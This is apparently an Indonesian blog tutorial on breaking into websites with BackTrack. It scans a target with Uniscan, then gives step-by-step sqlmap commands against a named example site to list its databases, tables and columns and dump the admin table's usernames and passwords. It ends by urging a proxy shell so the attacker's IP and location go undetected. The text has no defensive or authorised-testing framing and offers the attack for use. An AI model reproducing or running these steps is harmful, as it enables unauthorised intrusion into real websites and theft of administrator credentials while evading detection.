Advertisemen
Apa itu backtrack? yaitu sebuah distro Linux yang dibuat khusus untuk tujuan penetration dan testing keamanan sebuah sistem jaringan. BackTrack merupakan sebuah tools yang sangat powerful untuk itu. Banyak sekali senjata-senjata hacking yang sudah siap pakai di BackTrack
kali ini saya akan mencoba memberi tutorial Cara Hack Website Dengan BackTrack .
di sini kamu harus mencoba menjalankan terminal command line di backtrack .
atau kamu bisa menggunakan Applications yang sudah tersedia di bar BT.
Kita akan mencari kerentanan sebuah website.
- Pertama klik bagian pojok kiri atas
APPLICATION/ BackTrack / Vulnerability assessment /Web Application Assessment/ Web Vulnerability Scanners /Uniscan (dan terminal command line terbuka "tunggu proses"
- lalu masuk perintah di command line seperti berikut.
(Pastikan Anda sudah menentukan website yang ingin di target)
sebagai contoh: website target www.capungberbagi.cf
kamu harus ketik perintah sebagai berikut : ./uniscan -u www.capungberbagi.cf -d enter tunggu proses scanner .
- Jika proses scanner selesai dan mendapatkan kerentanan pada http://www.capungberbagi.cf/load.php?id=2 maka tinggal kamu eksekusi
- cara melakukan eksekusi website target . kamu perlu klik bagian pojok kiri atas
APPLICATION/ BackTrack /Exploitation Tools/ Web Exploitation Tools/ Sqlmap
maka command line akan terbuka .
- dan ketik perintah hacked di terminal commend line seperti berikut.
sertakan URL website target yang memiliki akhiran ?id= (bebas id)
CONTOH: http://www.capungberbagi.cf/load.php?id=2
lalu ketik perintah seperti ini: python ./sqlmap.py -u (URL Target) --dbs
CONTOH : python ./sqlmap.py -u http://www.capungberbagi.cf/load.php?id=2 --dbs Enter
maka akan terdapat beberapa database
[*] information_schema
[*] LIGHT_SPEED_OUTDOORS
[*] LIGHT_SPEED_TENTS
- sekarang kamu membongkar di balik database tersebut dengan perintah:
python ./sqlmap.py -u (URL TARGET) -D LIGHT_SPEED_OUTDOORS --tables
Contoh: python ./sqlmap.py -u http://www.capungberbagi.cf/load.php?id=2 -D LIGHT_SPEED_OUTDOORS --tables
- Maka akan terdapat beberapa table yang mencurigakan (kamu harus jeli)
- sekarang kamu ketik perintah seperti berikut di command line:
python ./sqlmap.py -u (URL TARGET) -T WEB_SESSION --columns
CONTOH:
python ./sqlmap.py -u http://www.capungberbagi.cf/load.php?id=2 -T WEB_SESSION --columns
- Sekarang ketik kembali perintah berikut:
python sqlmap.py -u(URL TARGET)-T admin -U test --dump
CONTOH:
python sqlmap.py -u http://www.capungberbagi.cf/load.php?id=2 -T admin -U test --dump
- selanjutnya kamu sudah mendapatkan admin login username dan password
NOTICE: untuk login Anda perlu menggunakan proxyshell dapatkan disini
agar IP dan lokasi Anda tidak terdeteksi.
Add Comments